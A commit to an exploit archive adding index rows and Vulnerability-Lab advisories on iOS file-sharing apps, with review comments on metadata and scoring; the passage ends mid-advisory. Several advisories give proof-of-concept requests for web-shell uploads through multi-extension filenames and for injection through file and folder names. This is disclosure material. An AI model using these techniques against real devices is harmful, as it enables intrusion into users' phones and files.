Updated 03_29_2014

Offensive Security 2014-03-29 04:33:51 +00:00
parent b4268e8a98
commit 211b2f8394
7 changed files with 1297 additions and 1 deletions


@ -9467,7 +9467,7 @@ id,file,description,date,author,platform,type,port
10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 authentication bypass",2009-11-13,"Stuart Udall",php,webapps,0
10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0
10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0
10099,platforms/windows/remote/10099.py,"HP Power Manager Administration Universal Buffer Overflow Exploit",2009-11-16,ryujin,windows,remote,80
10099,platforms/windows/remote/10099.py,"HP Power Manager Administration - Universal Buffer Overflow Exploit",2009-11-16,ryujin,windows,remote,80
10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 (LIST) Remote Denial of Service Exploit",2007-03-20,shinnai,windows,dos,21
10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0
10102,platforms/windows/dos/10102.pl,"Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit",2009-11-16,"Jeremy Brown",windows,dos,80
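Review bot: Consistency check only for this hunk: the retitled 10099 row keeps every other column (path, date 2009-11-16, author ryujin, platform, type, port 80) identical to the removed row, and the added " - " separator matches the "Product - Title" form of the surrounding rows (10097, 10101), so this is a safe metadata-only edit with no duplicate id introduced.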
@ -29318,3 +29318,9 @@ id,file,description,date,author,platform,type,port
32553,platforms/php/webapps/32553.txt,"phpWebSite <= 0.9.3 'links.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
32554,platforms/php/webapps/32554.txt,"SpitFire Photo Pro 'pages.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
32555,platforms/windows/remote/32555.html,"Opera Web Browser 9.62 History Search Input Validation Vulnerability",2008-10-31,NeoCoderz,windows,remote,0
32556,platforms/multiple/webapps/32556.txt,"Dell SonicWall EMail Security Appliance Application 7.4.5 - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,multiple,webapps,8619
32557,platforms/hardware/webapps/32557.txt,"FTP Drive + HTTP 1.0.4 iOS - Code Execution Vulnerability",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32558,platforms/hardware/webapps/32558.txt,"Lazybone Studios WiFi Music 1.0 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32559,platforms/hardware/webapps/32559.txt,"Easy FileManager 1.1 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32560,platforms/hardware/webapps/32560.txt,"ePhone Disk 1.0.2 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
32561,platforms/php/webapps/32561.txt,"LinEx - Password Reset Vulnerability",2014-03-27,"N B Sri Harsha",php,webapps,80
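Review bot: The date column of the six new rows (2014-03-27) does not match the release dates inside the added advisories (2014-03-20 for 32557, 2014-03-21 for 32558, 2014-03-25 for 32559 and 32560); if the column is meant to carry the advisory date rather than the import date, these values should be corrected. The CSV titles for 32559 and 32560 also drop the word "Web" that the advisories' own "Document Title" lines carry ("Multiple Web Vulnerabilities"), and 32560 drops the "v" of "v1.0.2"; minor, but worth keeping the CSV title equal to the document title so searches on either form hit.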



@ -0,0 +1,163 @@
Document Title:
===============
FTP Drive + HTTP 1.0.4 iOS - Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1231
Release Date:
=============
2014-03-20
Vulnerability Laboratory ID (VL-ID):
====================================
1231
Common Vulnerability Scoring System:
====================================
9.1
Product & Service Introduction:
===============================
FTP Drive + HTTP Server is the ultimate app as for usefullness and ease of use to bring with you and share all your
important files through your iPhone/iPod! When you`re in a hurry or simply wants the things done as they are supposed
to be done, you can use FTP Drive + HTTP Server. As the name implies, you can use this app mainly as an FTP Server,
so you can mount it as a Network Drive in your favorite operative system or you can browse the files through a web
browser like Firefox, Safari, Chrome, Internet Explorer, ...
(Copy of the Homepage: https://itunes.apple.com/us/app/ftp-drive-+-http-server-easiest/id455671784 )
(Vendor Homepage: http://www.gummybearstudios.com/ios.html )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory discovered a code execution web vulnerability in the official Gummy Bear Studios FTP Drive + HTTP Server v1.0.4 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-03-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
A code execution web vulnerability has been discovered in the official Gummy Bear Studios FTP Drive + HTTP Server v1.0.4 iOS mobile web-application.
The remote vulnerbaility allows an attacker to compromise the application and connected device components by usage of a system specific command execution.
The vulnerability is located in the create folder input field. The input field direct executes the input via GET method request. The request has only a simple
quotes encoding. Remote attackers are easily able to execute code by usage of a script code payload in combination with system device specific php code values.
The execution of the code occurs in the main index file dir listing service context. The attack vector is on application-side and the request method to attack
the service is GET. To bypass the path values validation it is required to first add a folder via `newDir` value. The remote attacker is able to tamper the
create new folder post method request and can intercept the values twice to attach the second manipulated path value to provoke a code execution. After the
add it is possible to attach to the already included values via create new folder to execute the code. The security risk of the remote code execution web
vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 9.0(+)|(-)9.1.
Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction.
Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected component compromise.
Vulnerable Module(s):
[+] Create New Folder
Vulnerable Parameter(s):
[+] path value
Proof of Concept (PoC):
=======================
The php code execution web vulnerability can be exploited by remote attackers without user interaction or privileged web-application user account.
For security demonstration or to reproduce the vulnerability follow the provided steps and information below to continue.
PoC:
http://localhost:8080/[CONNECTED PATH<]/?newDir=%22[<CODE EXECUTION VULNERABILITY!]#TEST
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:8080/[CONNECTED PATH<]/?newDir=%22[<CODE EXECUTION VULNERABILITY!]#TEST Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[3173] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/[CONNECTED PATH<]/?newDir=%22[<CODE EXECUTION VULNERABILITY!]#TEST]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[3173]
Date[Mi., 19 M?r. 2014 15:06:04 GMT]
Solution - Fix & Patch:
=======================
The code execution web vulnerability can be patched by a secure parse of the create new folder input field.
Adjust the encoding of the affected foldername output context value in the main index file dir list.
Security Risk:
==============
The security risk of the remote code execution web vulnerability in the create new folder module is estimated as critical.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
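Review bot: "Affected Product(s):" is left empty; the Easy FileManager and ePhone Disk advisories in this same commit fill in vendor and product/version, and this one should too (Gummy Bear Studios, FTP Drive + HTTP Server 1.0.4 iOS, both already named in the Abstract). The severity also needs reconciling with the description: the body describes a "script code payload" in the `newDir` value that is rendered in the directory-listing page with "only a simple quotes encoding", and the fix section prescribes encoding the folder-name output in the index listing, which is the remediation for script injection into the listing page, not for command execution on the device; a "Critical 9.1" code-execution rating is not supported by that description, and the body's own "9.0(+)|(-)9.1" differs from the 9.1 in the header. Minor: "vulnerbaility" (Technical Details, second line) is misspelled.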


@ -0,0 +1,262 @@
Document Title:
===============
Lazybone Studios WiFi Music 1.0 iOS - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1233
Release Date:
=============
2014-03-21
Vulnerability Laboratory ID (VL-ID):
====================================
1233
Common Vulnerability Scoring System:
====================================
7.1
Product & Service Introduction:
===============================
WiFi Music lets you transfer via Wi-Fi the songs you have in your computer to any iPhone, iPod touch or iPad
in your network. No iTunes required. Now you can share them with your friends and workmates, and stream them
directly to almost any media player!
( Copy to the Vendor Homepage: https://itunes.apple.com/de/app/wifi-music/id469617062 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple critical vulnerabilities in the official Lazybone Studios WiFi Music v1.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-03-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Lazybone Studios WiFi Music v1.0 iOS mobile web-application.
A file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
to compromise the web-application or mobile device.
The web vulnerability is located in the `filename` value of the `Upload File` module. Remote attackers are able to inject own files with
malicious `filename` value in the upload POST method request to compromise the mobile web-application. The attack vector is persistent and
the request method is POST. The local file/path include execution occcurs in the main music file dir list. The security risk of the local
file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.7(+)|(-)6.8.
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with
low user auth. Successful exploitation of the local file include web vulnerability results in mobile application or connected device
component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Select File > Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Music File Dir List (http://localhost:8080/)
1.2
An arbitrary file upload web vulnerability has been discovered in the official Lazybone Studios WiFi Music v1.0 iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the `upload` (video and music) module. Remote attackers are able to upload a php or js web-shells by renaming
the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name
and extension `ptest.mp3.html.php.js.aspx.mp3`. After the upload the attacker needs to open the file with the path value in the web application.
He deletes the .mp3 file extension and can access the application with elevated executable access rights. The security risk of the arbitrary file
upload web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.7(+)|(-)7.8.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Select File > Upload
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Music File Dir List (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by local attackers without user interaction or privileged application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: iChm File Management - Index
<table border="0" cellpadding="0" cellspacing="0">
<thead>
<tr><th>Name</th><th class="del">Delete</th></tr>
</thead><tbody id="filelist">
<tr><td><a href="/files/%3C[LOCAL FILE INCLUDE VULNERABILITY!]%3E" class="file"><./[LOCAL FILE INCLUDE VULNERABILITY!]"></a></td>
<td class='del'><form action='/files/%3C[LOCAL FILE INCLUDE VULNERABILITY!]%3E' method='post'><input name='_method' value='delete'
type='hidden'/><input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a></td></tr></tbody>
</table>
Source: Vulnerable Java Script (iChm File Management - Index)
<script type="text/javascript" charset="utf-8">
var now = new Date();
$.getJSON("/files?"+ now.toString(),
function(data){
var shadow = false;
$.each(data, function(i,item){
var trclass='';
if (shadow)
trclass= " class='shadow'";
encodeName = encodeURI(item.name).replace("'", "'");
$("<tr" + trclass + "><td><a href='/files/" + encodeName + "' class='file'>" + item.name + "</a></td>" + "<td class='del'>
<form action='/files/" + encodeName + "' method='post'><input name='_method' value='delete' type='hidden'/><input name=\"commit\"
type=\"submit\" value=\"Delete\" class='button' /></td>" + "</tr>").appendTo("#filelist");
shadow = !shadow;
});
});
</script>
--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------280732177711982
Content-Disposition: form-data; name="newfile"; filename="<./[LOCAL FILE INCLUDE WEB VULNERABILITY!]>"
Content-Type: image/png
Reference(s):
http://localhost:8080/[Index File Dir Listing]
1.2
The arbitrary file upload web vulnerability can be exploited by local attackers without user interaction or privileged application user account.
For security demonstration or to reproduce the file upload web vulnerability follow the provided information and steps below to continue.
PoC: http://localhost:8080/files/[ARBITRARY FILE UPLOAD PATH]-ptest.mp3.html.php.js.aspx.mp3`
--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------141831923231387
Content-Disposition: form-data; name="newfile"; filename="ptest.mp3.html.php.js.aspx.mp3"
Content-Type: image/jpeg
Reference(s):
http://localhost:8080/files
Solution - Fix & Patch:
=======================
1.1
The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload file POST method request.
Filter and encode also the filename output listing of the index.
1.2
Filter and restrict the file name validation on uploads to prevent arbitrary file upload attacks.
Implement a secure own exception-handling to restrict and disallow files with multiple extensions.
Reset the executable rights for html and php codes in the little web-server settings config for /files.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as high(-).
1.2
The security risk of the arbitrary file upload web vulnerability is estimated as high(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
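Review bot: The quoted listing script pins down the defect more precisely than the "local file include" label does: `encodeURI(item.name).replace("'", "'")` replaces an apostrophe with an apostrophe (a no-op), `encodeURI` itself leaves `'` unescaped so a quote in the name can close the single-quoted `href`/`action` attributes, and `item.name` is then concatenated raw into the `<a>` text, so an uploaded filename containing `<`, `>` or quotes is rendered as markup in the index page; the broken table in the PoC output is the symptom, and the fix section's "filter and encode the filename output listing" is the right remediation. Three documentation points: "Affected Product(s):" is empty (vendor Lazybone Studios, WiFi Music 1.0 iOS); "Exploitation Technique: Local" contradicts the body and the POST PoC, which describe remote attackers over the WiFi web interface; and the header score 7.1 matches neither 1.1 (6.7/6.8) nor 1.2 (7.7/7.8).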


@ -0,0 +1,250 @@
Document Title:
===============
Easy FileManager 1.1 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1234
Release Date:
=============
2014-03-25
Vulnerability Laboratory ID (VL-ID):
====================================
1234
Common Vulnerability Scoring System:
====================================
7.9
Product & Service Introduction:
===============================
This is a file management app which is very easy to use. You can manage your files under the specified directory, including copy,
cut, paste, delete, rename and create new directory. Preview the picture and play audio and video directly from the folder are supported.
This app also includes a simple FTP client. Users can use this client to connect to the remote ftp server, upload and download files from
the remote ftp server. It also includes a FTP Server and a HTTP Server. When you start the FTP Server, you can use common FTP client or
windows explorer to connect to the iphone via wifi. Also, when you start the HTTP Server, you can use internet browser to connect to the
server via wifi. It makes your iphone as a portable U disk. Its really easyt to use this app. The function buttons are clearly. Also,
you can just long click the screen to get the action list.
(Copy of the Homepage: https://itunes.apple.com/de/app/easy-file-manager/id487524125 )
(Vendor Homepage: http://www.easytimestudio.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple high severity vulnerabilities in the official Easytime Studio Easy File Manager v1.1 mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-03-25: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Easytime Studio
Product: Easy File Manager - iOS Mobile Web Application 1.1
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Easytime Studio Easy File Manager v1.1 mobile web-application.
A file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
to compromise the web-application or mobile device.
The web vulnerability is located in the `filename` value of the `Upload File > Send Data` module. Remote attackers are able to inject own
files with malicious `filename` value in the upload POST method request to compromise the mobile web-application. The attacker is able to
tamper the file upload POST method request to manipulate via intercept the vulnerable filename value. The request method to exploit is
POST and the attack vector is on the application-side of the wifi iOS mobile application. The local file/path include execution occcurs
in the main directory dir list. The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common
vulnerability scoring system) count of 7.8(+)|(-)7.9.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Select File > Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Directory Dir List (http://localhost:8080/)
1.2
An arbitrary file upload web vulnerability has been discovered in the official Easytime Studio Easy File Manager v1.1 mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the `Upload File > Send Data` (resources & files) module. Remote attackers are able to upload a php or js web-shells
by renaming the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following
name and extension `ptest.txt.html.php.js.aspx.txt`. After the upload the attacker needs to open the file with the path value in the web application.
He deletes the .txt file extension and can access the application with elevated executable access rights. The security risk of the arbitrary file
upload web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.9(+)|(-)7.0.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload File
Vulnerable Function(s):
[+] Send Data
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Directory Dir List (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by remote attackers without user interaction or privileged application user account (ui passwd blank).
For security demonstration or to reproduce the remote web vulnerability follow the provided information and steps below to continue.
PoC: Local File Include Vulnerability
http://localhost:8080/private/var/mobile/Applications/7A8AF3A4-0263-4E35-9E0A-74A430C18C7A/Documents/[LOCAL FILE INCLUDE VULNERABILITY!]
--- PoC- Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/private/var/mobile/Applications/7A8AF3A4-0263-4E35-9E0A-74A430C18C7A/Documents/Videos?sessionid=f7aa0a7f-98cd-4477-9e1b-dda96297044a Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Größe des Inhalts[1807] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept
[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/private/var/mobile/Applications/7A8AF3A4
-0263-4E35-9E0A-74A430C18C7A/Documents/Videos?sessionid=f7aa0a7f-98cd-4477-9e1b-dda96297044a]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------881557262072
Content-Disposition: form-data; name="uploadfile"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]"
Content-Type: image/png
1.2
The arbitary file uplaod web vulnerability can be exploited by remote attackers without user interaction or privileged application user account (ui passwd blank).
For security demonstration or to reproduce the remote web vulnerability follow the provided information and steps below to continue.
PoC: Arbitrary File Upload Vulnerability (Upload File)
http://localhost:8080/private/var/./.\[http://localhost:8080/private/var/mobile/Applications/]+File
--- PoC- Session Logs [POST] ---
Status: pending[]
POST http://localhost:8080/private/var Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/private/var]
POST-Daten:
POST_DATA[-----------------------------245202094720816
Content-Disposition: form-data; name="uploadfile"; filename="test.jpg.html.php.asp.html.jpg"
Content-Type: image/jpeg
Note: After the upload to the private /var folder the attacker is able to attach the document path with the file to compromise the web-server.
Solution - Fix & Patch:
=======================
1.1
The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload file POST method request.
Filter and encode also the filename output listing of the index.
1.2
Filter and restrict the file name validation on uploads to prevent arbitrary file upload attacks.
Implement a secure own exception-handling to restrict and disallow files with multiple extensions.
Reset the executable rights for html and php codes in the little web-server settings config for /files.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as high(+).
1.2
The security risk of the arbitrary file upload web vulnerability is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Katharin S. L. (CH) (research@vulnerability-lab.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


@ -0,0 +1,269 @@
Document Title:
===============
ePhone Disk v1.0.2 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1230
Release Date:
=============
2014-03-25
Vulnerability Laboratory ID (VL-ID):
====================================
1230
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:
===============================
ePhone Disk is lightweight file manager that lets you download, organize, transfer, offline read your files.
It provides the most advanced WiFi sharing features in market.
SHARE FILES VIA WIFI
- Access iPhone like a USB drive from computer, simply use Drag and Drop to manage files
- Discover nearby devices, and discoverable by others
- Single tap to connect to nearby devices
- Accessible from any WebDav client
( Copy of the Homepage: https://itunes.apple.com/us/app/ephone-disk-download-share/id621895613 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Easiermobile Inc - ePhone Disk v1.0.2 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-03-25: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Easiermobile Inc
Product: ePhone Disk iOS - Download, Share Files via WiFi 1.0.2
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Easiermobile Inc - ePhone Disk v1.0.2 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
commands to compromise the web-application or mobile device.
The web vulnerability is located in the `filename` value of the `Upload file` module. Remote attackers are able to inject own files with malicious
`filename` value in the upload POST method request to compromise the mobile web-application. The attack vector is persistent and the request
method is POST. The local file/path include execution occcurs in the main file dir list. The security risk of the local file include web vulnerability
is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.8(+)|(-)6.9.
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with low user auth.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload File
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Upload File > Index File Dir List (http://localhost:8080)
1.2
A local command/path injection web vulnerabilities has been discovered in the official Easiermobile Inc - ePhone Disk v1.0.2 iOS mobile web-application.
A command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the vulnerable `foldername` value of the wifi file dir list module. Local attackers are able to inject own malicious
system specific commands or path value requests in the vulnerable foldername value. The injection requires a active sync with the wifi app stored folders.
The execution of the local command inject bug via foldername value on sync occurs in the file dir index list of the main upload path. The security risk of
